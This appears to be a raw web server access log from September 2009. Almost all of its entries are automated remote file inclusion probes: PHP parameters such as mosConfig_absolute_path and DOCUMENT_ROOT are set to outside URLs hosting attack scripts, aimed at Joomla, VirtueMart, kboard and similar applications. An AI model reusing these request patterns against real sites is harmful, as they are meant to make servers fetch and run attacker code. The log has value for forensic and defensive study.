210.221.154.117 - - [07/Sep/2009:08:47:11 -0500] "GET /logs/errors.php?error=http://www.ybcyyy.com/data/zkjs/fx29id1.txt? HTTP/1.1" 404 298 "-""Mozilla/5.0"
210.221.154.117 - - [07/Sep/2009:08:47:11 -0500] "GET /logs/access_log.1240099200/errors.php?error=http://www.ybcyyy.com/data/zkjs/fx29id1.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
210.221.154.117 - - [07/Sep/2009:08:47:11 -0500] "GET /logs/access_log.1236902400/errors.php?error=http://www.ybcyyy.com/data/zkjs/fx29id1.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
91.121.17.77 - - [07/Sep/2009:08:49:41 -0500] "GET /logs/access_log.1228608000//kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://www.traceback-ip.eu/v6-i.txt??? HTTP/1.1" 404 321 "-""libwww-perl/5.813"
91.121.17.77 - - [07/Sep/2009:08:49:41 -0500] "GET /logs//kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://www.traceback-ip.eu/v6-i.txt??? HTTP/1.1" 404 299 "-""libwww-perl/5.813"
91.121.17.77 - - [07/Sep/2009:08:49:41 -0500] "GET //kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://www.traceback-ip.eu/v6-i.txt??? HTTP/1.1" 404 294 "-""libwww-perl/5.813"
158.170.20.31 - - [07/Sep/2009:08:49:50 -0500] "GET /logs/main.php?pagina=http://sqlz.interfree.it/bovsp.txt?&mode=id HTTP/1.1" 404 296 "-""-"
158.170.20.31 - - [07/Sep/2009:08:49:50 -0500] "GET /main.php?pagina=http://sqlz.interfree.it/bovsp.txt?&mode=id HTTP/1.1" 404 291 "-""-"
67.212.175.154 - - [07/Sep/2009:08:50:24 -0500] "GET /logs//_test_holidays.php?APB_rp=http://www.artvariety.co.za/scan/zfxid1.txt?? HTTP/1.1" 404 307 "-""Mozilla/5.0"
67.212.175.154 - - [07/Sep/2009:08:50:24 -0500] "GET /logs/access_log.1228608000%20%20//_test_holidays.php?APB_rp=http://www.artvariety.co.za/scan/zfxid1.txt?? HTTP/1.1" 404 331 "-""Mozilla/5.0"
67.212.175.154 - - [07/Sep/2009:08:50:24 -0500] "GET //_test_holidays.php?APB_rp=http://www.artvariety.co.za/scan/zfxid1.txt?? HTTP/1.1" 404 302 "-""Mozilla/5.0"
67.212.175.154 - - [07/Sep/2009:08:50:27 -0500] "GET /logs//_test_holidays.php?APB_rp=http://www.artvariety.co.za/scan/zfxid1.txt?? HTTP/1.1" 404 307 "-""Mozilla/5.0"
67.212.175.154 - - [07/Sep/2009:08:50:27 -0500] "GET //_test_holidays.php?APB_rp=http://www.artvariety.co.za/scan/zfxid1.txt?? HTTP/1.1" 404 302 "-""Mozilla/5.0"
67.212.175.154 - - [07/Sep/2009:08:50:27 -0500] "GET /logs/access_log.1228608000%20%20//_test_holidays.php?APB_rp=http://www.artvariety.co.za/scan/zfxid1.txt?? HTTP/1.1" 404 331 "-""Mozilla/5.0"
58.184.252.3 - - [07/Sep/2009:08:50:34 -0500] "GET /logs/access_log.1244419200/cgi-bin//gadgets/Blog/BlogModel.php?path=http://www.partyplans.com.au/forum2/fx29id1.txt??? HTTP/1.1" 404 345 "-""Mozilla/5.0"
211.239.157.203 - - [07/Sep/2009:08:50:49 -0500] "GET /logs/access_log.1244764800/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.mabuhayradio.com/components/com_agora/img/members/0/1.jpg? HTTP/1.1" 404 370 "-""Mozilla/5.0"
211.239.157.203 - - [07/Sep/2009:08:50:49 -0500] "GET /administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.mabuhayradio.com/components/com_agora/img/members/0/1.jpg? HTTP/1.1" 404 343 "-""Mozilla/5.0"
211.239.157.203 - - [07/Sep/2009:08:50:49 -0500] "GET /logs/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.mabuhayradio.com/components/com_agora/img/members/0/1.jpg? HTTP/1.1" 404 348 "-""Mozilla/5.0"
67.212.175.154 - - [07/Sep/2009:08:51:41 -0500] "GET /logs/access_log.1228608000//_test_holidays.php?APB_rp=http://www.artvariety.co.za/scan/zfxid1.txt?? HTTP/1.1" 404 329 "-""Mozilla/5.0"
67.212.175.154 - - [07/Sep/2009:08:51:41 -0500] "GET //_test_holidays.php?APB_rp=http://www.artvariety.co.za/scan/zfxid1.txt?? HTTP/1.1" 404 302 "-""Mozilla/5.0"
67.212.175.154 - - [07/Sep/2009:08:51:41 -0500] "GET /logs//_test_holidays.php?APB_rp=http://www.artvariety.co.za/scan/zfxid1.txt?? HTTP/1.1" 404 307 "-""Mozilla/5.0"
67.212.175.154 - - [07/Sep/2009:08:51:41 -0500] "GET //_test_holidays.php?APB_rp=http://www.artvariety.co.za/scan/zfxid1.txt?? HTTP/1.1" 404 302 "-""Mozilla/5.0"
67.212.175.154 - - [07/Sep/2009:08:51:41 -0500] "GET /logs//_test_holidays.php?APB_rp=http://www.artvariety.co.za/scan/zfxid1.txt?? HTTP/1.1" 404 307 "-""Mozilla/5.0"
67.212.175.154 - - [07/Sep/2009:08:51:41 -0500] "GET /logs/access_log.1228608000//_test_holidays.php?APB_rp=http://www.artvariety.co.za/scan/zfxid1.txt?? HTTP/1.1" 404 329 "-""Mozilla/5.0"
61.100.5.136 - - [07/Sep/2009:08:52:07 -0500] "GET /logs/access_log.1239580800//jscript.php?my_ms[root]=http://museum-mputantular.com/css/id1?? HTTP/1.1" 404 322 "-""Mozilla/5.0"
61.100.5.136 - - [07/Sep/2009:08:52:07 -0500] "GET //jscript.php?my_ms[root]=http://museum-mputantular.com/css/id1?? HTTP/1.1" 404 295 "-""Mozilla/5.0"
61.100.5.136 - - [07/Sep/2009:08:52:07 -0500] "GET /logs//jscript.php?my_ms[root]=http://museum-mputantular.com/css/id1?? HTTP/1.1" 404 300 "-""Mozilla/5.0"
61.100.5.136 - - [07/Sep/2009:08:52:07 -0500] "GET //jscript.php?my_ms[root]=http://museum-mputantular.com/css/id1?? HTTP/1.1" 404 295 "-""Mozilla/5.0"
61.100.5.136 - - [07/Sep/2009:08:52:07 -0500] "GET /logs//jscript.php?my_ms[root]=http://museum-mputantular.com/css/id1?? HTTP/1.1" 404 300 "-""Mozilla/5.0"
61.100.5.136 - - [07/Sep/2009:08:52:07 -0500] "GET /logs/access_log.1239580800//jscript.php?my_ms[root]=http://museum-mputantular.com/css/id1?? HTTP/1.1" 404 322 "-""Mozilla/5.0"
204.15.230.189 - - [07/Sep/2009:08:52:16 -0500] "GET /logs/index.php?DOCUMENT_ROOT=http://www.greensamsung.com//upload/mc.txt??? HTTP/1.1" 404 297 "-""libwww-perl/5.79"
204.15.230.189 - - [07/Sep/2009:08:52:16 -0500] "GET /index.php?DOCUMENT_ROOT=http://www.greensamsung.com//upload/mc.txt??? HTTP/1.1" 404 292 "-""libwww-perl/5.79"
87.98.252.56 - - [07/Sep/2009:08:52:43 -0500] "GET /logs//kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://www.traceback-ip.eu/master-id.txt? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
87.98.252.56 - - [07/Sep/2009:08:52:43 -0500] "GET //kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://www.traceback-ip.eu/master-id.txt? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
211.189.18.73 - - [07/Sep/2009:08:55:14 -0500] "GET /logs/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.jejucasa.com/bbs//include/idi.txt??? HTTP/1.1" 404 297 "-""libwww-perl/5.79"
211.189.18.73 - - [07/Sep/2009:08:55:15 -0500] "GET /index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.jejucasa.com/bbs//include/idi.txt??? HTTP/1.1" 404 292 "-""libwww-perl/5.79"
211.189.18.73 - - [07/Sep/2009:08:55:16 -0500] "GET /logs/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.jejucasa.com/bbs//include/idi.txt??? HTTP/1.1" 404 297 "-""libwww-perl/5.79"
211.189.18.73 - - [07/Sep/2009:08:55:16 -0500] "GET /index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.jejucasa.com/bbs//include/idi.txt??? HTTP/1.1" 404 292 "-""libwww-perl/5.79"
79.170.45.43 - - [07/Sep/2009:08:56:20 -0500] "GET /logs/admin.a6mambocredits.php?mosConfig_live_site=http://bov.t35.com/idv6.txt??? HTTP/1.1" 404 312 "-""libwww-perl/5.831"
79.170.45.43 - - [07/Sep/2009:08:56:20 -0500] "GET /admin.a6mambocredits.php?mosConfig_live_site=http://bov.t35.com/idv6.txt??? HTTP/1.1" 404 307 "-""libwww-perl/5.831"
93.99.254.254 - - [07/Sep/2009:08:56:26 -0500] "GET //bemarket/postscript/postscript.php?p_mode=http://www.hotlinkfiles.com/files/2792220_datae/fx29id2.txt??? HTTP/1.1" 404 318 "-""Mozilla/5.0"
93.99.254.254 - - [07/Sep/2009:08:56:26 -0500] "GET /logs/access_log.1246320000//bemarket/postscript/postscript.php?p_mode=http://www.hotlinkfiles.com/files/2792220_datae/fx29id2.txt??? HTTP/1.1" 404 345 "-""Mozilla/5.0"
93.99.254.254 - - [07/Sep/2009:08:56:26 -0500] "GET /logs//bemarket/postscript/postscript.php?p_mode=http://www.hotlinkfiles.com/files/2792220_datae/fx29id2.txt??? HTTP/1.1" 404 323 "-""Mozilla/5.0"
94.23.194.161 - - [07/Sep/2009:08:56:31 -0500] "GET /logs//include/bbs.lib.inc.php?site_path=http://www.traceback-ip.eu/roxx.jpg??? HTTP/1.1" 404 312 "-""libwww-perl/5.805"
94.23.194.161 - - [07/Sep/2009:08:56:31 -0500] "GET //include/bbs.lib.inc.php?site_path=http://www.traceback-ip.eu/roxx.jpg??? HTTP/1.1" 404 307 "-""libwww-perl/5.805"
87.98.252.56 - - [07/Sep/2009:08:56:37 -0500] "GET /logs/access_log.1228608000//kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://www.traceback-ip.eu/master-id.txt? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
87.98.252.56 - - [07/Sep/2009:08:56:38 -0500] "GET //kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://www.traceback-ip.eu/master-id.txt? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
87.98.252.56 - - [07/Sep/2009:08:56:38 -0500] "GET /logs//kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://www.traceback-ip.eu/master-id.txt? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
67.212.175.154 - - [07/Sep/2009:08:57:15 -0500] "GET /logs//toolbar.php?dirDepth=http://www.artvariety.co.za/scan/zfxid1.txt?? HTTP/1.1" 404 300 "-""Mozilla/5.0"
67.212.175.154 - - [07/Sep/2009:08:57:15 -0500] "GET /logs/access_log.1237075200//toolbar.php?dirDepth=http://www.artvariety.co.za/scan/zfxid1.txt?? HTTP/1.1" 404 322 "-""Mozilla/5.0"
67.212.175.154 - - [07/Sep/2009:08:57:15 -0500] "GET //toolbar.php?dirDepth=http://www.artvariety.co.za/scan/zfxid1.txt?? HTTP/1.1" 404 295 "-""Mozilla/5.0"
67.212.175.154 - - [07/Sep/2009:08:57:15 -0500] "GET /logs/access_log.1236038400//toolbar.php?dirDepth=http://www.artvariety.co.za/scan/zfxid1.txt?? HTTP/1.1" 404 322 "-""Mozilla/5.0"
72.29.82.154 - - [07/Sep/2009:08:57:18 -0500] "GET //include/bbs.lib.inc.php?site_path=http://dogstudio.net/ampoll/idxx.txt?? HTTP/1.1" 404 307 "-""Mozilla/5.0"
72.29.82.154 - - [07/Sep/2009:08:57:18 -0500] "GET /logs//include/bbs.lib.inc.php?site_path=http://dogstudio.net/ampoll/idxx.txt?? HTTP/1.1" 404 312 "-""Mozilla/5.0"
72.29.82.154 - - [07/Sep/2009:08:57:18 -0500] "GET /logs/access_log.1242432000//include/bbs.lib.inc.php?site_path=http://dogstudio.net/ampoll/idxx.txt?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
72.29.82.154 - - [07/Sep/2009:08:57:18 -0500] "GET /logs/access_log.1233705600//include/bbs.lib.inc.php?site_path=http://dogstudio.net/ampoll/idxx.txt?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
219.85.63.226 - - [07/Sep/2009:08:57:22 -0500] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://messinia.onegreece.com/tmp/copyright.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
219.85.63.226 - - [07/Sep/2009:08:57:22 -0500] "GET /logs/access_log.1247097600//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://messinia.onegreece.com/tmp/copyright.txt?? HTTP/1.1" 404 361 "-""Mozilla/5.0"
219.85.63.226 - - [07/Sep/2009:08:57:23 -0500] "GET /logs/access_log.1247097600//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://messinia.onegreece.com/tmp/copyright.txt?? HTTP/1.1" 404 361 "-""Mozilla/5.0"
219.85.63.226 - - [07/Sep/2009:08:57:23 -0500] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://messinia.onegreece.com/tmp/copyright.txt?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
219.85.63.226 - - [07/Sep/2009:08:57:23 -0500] "GET /logs/access_log.1247184000//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://messinia.onegreece.com/tmp/copyright.txt?? HTTP/1.1" 404 361 "-""Mozilla/5.0"
219.85.63.226 - - [07/Sep/2009:08:57:23 -0500] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://messinia.onegreece.com/tmp/copyright.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
67.212.175.154 - - [07/Sep/2009:08:57:31 -0500] "GET //toolbar.php?dirDepth=http://www.artvariety.co.za/scan/zfxid1.txt?? HTTP/1.1" 404 295 "-""Mozilla/5.0"
67.212.175.154 - - [07/Sep/2009:08:57:31 -0500] "GET /logs/access_log.1237075200//toolbar.php?dirDepth=http://www.artvariety.co.za/scan/zfxid1.txt?? HTTP/1.1" 404 322 "-""Mozilla/5.0"
67.212.175.154 - - [07/Sep/2009:08:57:31 -0500] "GET /logs//toolbar.php?dirDepth=http://www.artvariety.co.za/scan/zfxid1.txt?? HTTP/1.1" 404 300 "-""Mozilla/5.0"
67.212.175.154 - - [07/Sep/2009:08:57:31 -0500] "GET /logs/access_log.1236038400//toolbar.php?dirDepth=http://www.artvariety.co.za/scan/zfxid1.txt?? HTTP/1.1" 404 322 "-""Mozilla/5.0"
67.212.175.154 - - [07/Sep/2009:08:58:02 -0500] "GET /logs/access_log.1235347200//toolbar.php?dirDepth=http://www.artvariety.co.za/scan/zfxid1.txt?? HTTP/1.1" 404 322 "-""Mozilla/5.0"
67.212.175.154 - - [07/Sep/2009:08:58:02 -0500] "GET /logs/access_log.1236124800//toolbar.php?dirDepth=http://www.artvariety.co.za/scan/zfxid1.txt?? HTTP/1.1" 404 322 "-""Mozilla/5.0"
67.212.175.154 - - [07/Sep/2009:08:58:06 -0500] "GET /logs/access_log.1235347200//toolbar.php?dirDepth=http://www.artvariety.co.za/scan/zfxid1.txt?? HTTP/1.1" 404 322 "-""Mozilla/5.0"
207.58.163.86 - - [07/Sep/2009:08:58:24 -0500] "GET //administrator/components/com_virtuemart/virtuemart.cfg.php?mosConfig_absolute_path=http://alandar.net/www2/log1.txt?? HTTP/1.1" 404 342 "-""Mozilla/5.0"
207.58.163.86 - - [07/Sep/2009:08:58:24 -0500] "GET /logs//administrator/components/com_virtuemart/virtuemart.cfg.php?mosConfig_absolute_path=http://alandar.net/www2/log1.txt?? HTTP/1.1" 404 347 "-""Mozilla/5.0"
207.58.163.86 - - [07/Sep/2009:08:58:24 -0500] "GET /logs/access_log.1243814400//administrator/components/com_virtuemart/virtuemart.cfg.php?mosConfig_absolute_path=http://alandar.net/www2/log1.txt?? HTTP/1.1" 404 369 "-""Mozilla/5.0"
207.58.163.86 - - [07/Sep/2009:08:58:40 -0500] "GET /logs//administrator/components/com_virtuemart/virtuemart.cfg.php?mosConfig_absolute_path=http://alandar.net/www2/log1.txt?? HTTP/1.1" 404 347 "-""Mozilla/5.0"
207.58.163.86 - - [07/Sep/2009:08:58:40 -0500] "GET /logs/access_log.1240185600//administrator/components/com_virtuemart/virtuemart.cfg.php?mosConfig_absolute_path=http://alandar.net/www2/log1.txt?? HTTP/1.1" 404 369 "-""Mozilla/5.0"
207.58.163.86 - - [07/Sep/2009:08:58:40 -0500] "GET //administrator/components/com_virtuemart/virtuemart.cfg.php?mosConfig_absolute_path=http://alandar.net/www2/log1.txt?? HTTP/1.1" 404 342 "-""Mozilla/5.0"
207.58.163.86 - - [07/Sep/2009:08:59:07 -0500] "GET /logs/access_log.1243814400//administrator/components/com_virtuemart/virtuemart.cfg.php?mosConfig_absolute_path=http://alandar.net/www2/log1.txt?? HTTP/1.1" 404 369 "-""Mozilla/5.0"
67.212.175.154 - - [07/Sep/2009:09:00:30 -0500] "GET /logs/access_log.1244764800//toolbar.php?dirDepth=http://www.artvariety.co.za/scan/zfxid1.txt?? HTTP/1.1" 404 322 "-""Mozilla/5.0"
67.212.175.154 - - [07/Sep/2009:09:01:48 -0500] "GET /logs/access_log.1244764800//toolbar.php?dirDepth=http://www.artvariety.co.za/scan/zfxid1.txt?? HTTP/1.1" 404 322 "-""Mozilla/5.0"
65.38.188.164 - - [07/Sep/2009:09:04:40 -0500] "GET /community/modules/agendax/addevent.inc.php?agendax_path=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 325 "-""Mozilla/5.0"
65.38.188.164 - - [07/Sep/2009:09:04:40 -0500] "GET /logs/access_log.1244764800/community/modules/agendax/addevent.inc.php?agendax_path=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 352 "-""Mozilla/5.0"
65.38.188.164 - - [07/Sep/2009:09:04:40 -0500] "GET /logs/community/modules/agendax/addevent.inc.php?agendax_path=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 330 "-""Mozilla/5.0"
65.38.188.164 - - [07/Sep/2009:09:04:50 -0500] "GET /community/modules/agendax/addevent.inc.php?agendax_path=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 325 "-""Mozilla/5.0"
65.38.188.164 - - [07/Sep/2009:09:04:50 -0500] "GET /logs/community/modules/agendax/addevent.inc.php?agendax_path=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 330 "-""Mozilla/5.0"
65.38.188.164 - - [07/Sep/2009:09:04:50 -0500] "GET /logs/access_log.1244764800/community/modules/agendax/addevent.inc.php?agendax_path=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 352 "-""Mozilla/5.0"
65.55.230.166 - - [07/Sep/2009:09:06:16 -0500] "GET /robots.txt HTTP/1.1" 404 293 "-""Mozilla/4.0"
65.55.230.166 - - [07/Sep/2009:09:06:17 -0500] "GET /logs/access_log.1243123200 HTTP/1.1" 200 765054 "-""Mozilla/4.0"
65.55.207.119 - - [07/Sep/2009:09:06:32 -0500] "GET /logs/access_log.1189123200 HTTP/1.0" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
69.64.84.44 - - [07/Sep/2009:09:08:11 -0500] "GET /?DOCUMENT_ROOT=http://expo.ubsc.or.kr/board///mail/mailer/fx29id2.txt?? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
69.64.84.44 - - [07/Sep/2009:09:08:12 -0500] "GET /logs/access_log.1239667200/?DOCUMENT_ROOT=http://expo.ubsc.or.kr/board///mail/mailer/fx29id2.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
69.64.84.44 - - [07/Sep/2009:09:08:13 -0500] "GET /logs/?DOCUMENT_ROOT=http://expo.ubsc.or.kr/board///mail/mailer/fx29id2.txt?? HTTP/1.1" 200 204070 "-""Mozilla/5.0"
69.64.84.44 - - [07/Sep/2009:09:08:14 -0500] "GET /?DOCUMENT_ROOT=http://expo.ubsc.or.kr/board///mail/mailer/fx29id2.txt?? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
69.64.84.44 - - [07/Sep/2009:09:08:15 -0500] "GET /logs/access_log.1239667200/?DOCUMENT_ROOT=http://expo.ubsc.or.kr/board///mail/mailer/fx29id2.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
69.64.84.44 - - [07/Sep/2009:09:08:15 -0500] "GET /logs/?DOCUMENT_ROOT=http://expo.ubsc.or.kr/board///mail/mailer/fx29id2.txt?? HTTP/1.1" 200 204070 "-""Mozilla/5.0"
69.64.84.44 - - [07/Sep/2009:09:08:17 -0500] "GET /logs/access_log.1248134400/?DOCUMENT_ROOT=http://expo.ubsc.or.kr/board///mail/mailer/fx29id2.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
69.64.84.44 - - [07/Sep/2009:09:08:21 -0500] "GET /logs/access_log.1248134400/?DOCUMENT_ROOT=http://expo.ubsc.or.kr/board///mail/mailer/fx29id2.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
69.64.84.44 - - [07/Sep/2009:09:08:56 -0500] "GET /admin/lang.php?CMS_ADMIN_PAGE=http://www.cascadecollision.com////components/dialog/fx29id1.txt??? HTTP/1.1" 404 297 "-""Mozilla/5.0"
69.64.84.44 - - [07/Sep/2009:09:08:56 -0500] "GET /logs/admin/lang.php?CMS_ADMIN_PAGE=http://www.cascadecollision.com////components/dialog/fx29id1.txt??? HTTP/1.1" 404 302 "-""Mozilla/5.0"
69.64.84.44 - - [07/Sep/2009:09:08:56 -0500] "GET /logs/access_log.1238112000/admin/lang.php?CMS_ADMIN_PAGE=http://www.cascadecollision.com////components/dialog/fx29id1.txt??? HTTP/1.1" 404 324 "-""Mozilla/5.0"
94.136.37.141 - - [07/Sep/2009:09:09:59 -0500] "GET //?_zb_path=http://www.standrewkimchicago.org/bbs/data/daegun/mildfx.txt??? HTTP/1.1" 200 3245 "-""libwww-perl/5.803"
94.136.37.141 - - [07/Sep/2009:09:10:01 -0500] "GET /logs//?_zb_path=http://www.standrewkimchicago.org/bbs/data/daegun/mildfx.txt??? HTTP/1.1" 200 204075 "-""libwww-perl/5.803"
94.136.37.141 - - [07/Sep/2009:09:10:04 -0500] "GET //?_zb_path=http://www.standrewkimchicago.org/bbs/data/daegun/mildfx.txt??? HTTP/1.1" 200 3245 "-""libwww-perl/5.803"
94.136.37.141 - - [07/Sep/2009:09:10:05 -0500] "GET /logs//?_zb_path=http://www.standrewkimchicago.org/bbs/data/daegun/mildfx.txt??? HTTP/1.1" 200 204075 "-""libwww-perl/5.803"
94.136.37.141 - - [07/Sep/2009:09:10:12 -0500] "GET //?_zb_path=http://ta-photo.com/templates/Varages/mild.txt??? HTTP/1.1" 200 3245 "-""libwww-perl/5.803"
94.136.37.141 - - [07/Sep/2009:09:10:14 -0500] "GET /logs//?_zb_path=http://ta-photo.com/templates/Varages/mild.txt??? HTTP/1.1" 200 204075 "-""libwww-perl/5.803"
81.24.35.80 - - [07/Sep/2009:09:10:37 -0500] "GET /logs/access_log.1244764800//administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.wdiet.co.kr/img/file/dot.gif?? HTTP/1.1" 404 369 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5"
81.24.35.80 - - [07/Sep/2009:09:10:37 -0500] "GET /logs//administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.wdiet.co.kr/img/file/dot.gif?? HTTP/1.1" 404 347 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5"
81.24.35.80 - - [07/Sep/2009:09:10:37 -0500] "GET //administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.wdiet.co.kr/img/file/dot.gif?? HTTP/1.1" 404 342 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5"
81.24.35.80 - - [07/Sep/2009:09:10:50 -0500] "GET /logs/access_log.1245456000//administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.wdiet.co.kr/img/file/dot.gif?? HTTP/1.1" 404 369 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5"
211.189.18.73 - - [07/Sep/2009:09:11:06 -0500] "GET /logs//skin/zero_vote/admin.php?dir=http://shanghaisisa.com/chboard/images/id1.txt?? HTTP/1.1" 404 313 "-""Mozilla/5.0"
211.189.18.73 - - [07/Sep/2009:09:11:06 -0500] "GET //skin/zero_vote/admin.php?dir=http://shanghaisisa.com/chboard/images/id1.txt?? HTTP/1.1" 404 308 "-""Mozilla/5.0"
211.189.18.73 - - [07/Sep/2009:09:11:06 -0500] "GET /logs/access_log.1240012800//skin/zero_vote/admin.php?dir=http://shanghaisisa.com/chboard/images/id1.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
66.148.68.101 - - [07/Sep/2009:09:11:24 -0500] "GET //view.php?id=http://www.yamagiku.net//admin/install/id1.txt? HTTP/1.1" 404 292 "-""Mozilla/5.0"
66.148.68.101 - - [07/Sep/2009:09:11:24 -0500] "GET /logs//view.php?id=http://www.yamagiku.net//admin/install/id1.txt? HTTP/1.1" 404 297 "-""Mozilla/5.0"
66.148.68.101 - - [07/Sep/2009:09:11:24 -0500] "GET /logs/access_log.1238716800//view.php?id=http://www.yamagiku.net//admin/install/id1.txt? HTTP/1.1" 404 319 "-""Mozilla/5.0"
66.148.68.101 - - [07/Sep/2009:09:11:24 -0500] "GET /logs/access_log.1238803200//view.php?id=http://www.yamagiku.net//admin/install/id1.txt? HTTP/1.1" 404 319 "-""Mozilla/5.0"
81.24.35.80 - - [07/Sep/2009:09:11:42 -0500] "GET /logs/access_log.1243209600//administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.wdiet.co.kr/img/file/dot.gif?? HTTP/1.1" 404 369 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5"
94.75.245.36 - - [07/Sep/2009:09:11:45 -0500] "GET /logs/access_log.1233619200/s_loadenv.inc.php?DOCUMENT_ROOT=http://beep-beep.ru/scripts/x? HTTP/1.1" 404 327 "-""Mozilla/5.0"
94.75.245.36 - - [07/Sep/2009:09:11:45 -0500] "GET /logs/s_loadenv.inc.php?DOCUMENT_ROOT=http://beep-beep.ru/scripts/x? HTTP/1.1" 404 305 "-""Mozilla/5.0"
94.75.245.36 - - [07/Sep/2009:09:11:45 -0500] "GET /s_loadenv.inc.php?DOCUMENT_ROOT=http://beep-beep.ru/scripts/x? HTTP/1.1" 404 300 "-""Mozilla/5.0"
211.189.18.73 - - [07/Sep/2009:09:11:53 -0500] "GET /logs/access_log.1240012800//skin/zero_vote/admin.php?dir=http://shanghaisisa.com/chboard/images/id1.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
211.189.18.73 - - [07/Sep/2009:09:11:53 -0500] "GET /logs//skin/zero_vote/admin.php?dir=http://shanghaisisa.com/chboard/images/id1.txt?? HTTP/1.1" 404 313 "-""Mozilla/5.0"
211.189.18.73 - - [07/Sep/2009:09:11:59 -0500] "GET //skin/zero_vote/admin.php?dir=http://shanghaisisa.com/chboard/images/id1.txt?? HTTP/1.1" 404 308 "-""Mozilla/5.0"
66.148.68.101 - - [07/Sep/2009:09:12:02 -0500] "GET //view.php?id=http://www.yamagiku.net//admin/install/id1.txt? HTTP/1.1" 404 292 "-""Mozilla/5.0"
66.148.68.101 - - [07/Sep/2009:09:12:02 -0500] "GET /logs//view.php?id=http://www.yamagiku.net//admin/install/id1.txt? HTTP/1.1" 404 297 "-""Mozilla/5.0"
66.148.68.101 - - [07/Sep/2009:09:12:02 -0500] "GET /logs/access_log.1238803200//view.php?id=http://www.yamagiku.net//admin/install/id1.txt? HTTP/1.1" 404 319 "-""Mozilla/5.0"
66.148.68.101 - - [07/Sep/2009:09:12:02 -0500] "GET /logs/access_log.1238716800//view.php?id=http://www.yamagiku.net//admin/install/id1.txt? HTTP/1.1" 404 319 "-""Mozilla/5.0"
81.24.35.80 - - [07/Sep/2009:09:12:25 -0500] "GET //administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.wdiet.co.kr/img/file/dot.gif?? HTTP/1.1" 404 350 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5"
81.24.35.80 - - [07/Sep/2009:09:12:25 -0500] "GET /logs/access_log.1244764800//administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.wdiet.co.kr/img/file/dot.gif?? HTTP/1.1" 404 377 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5"
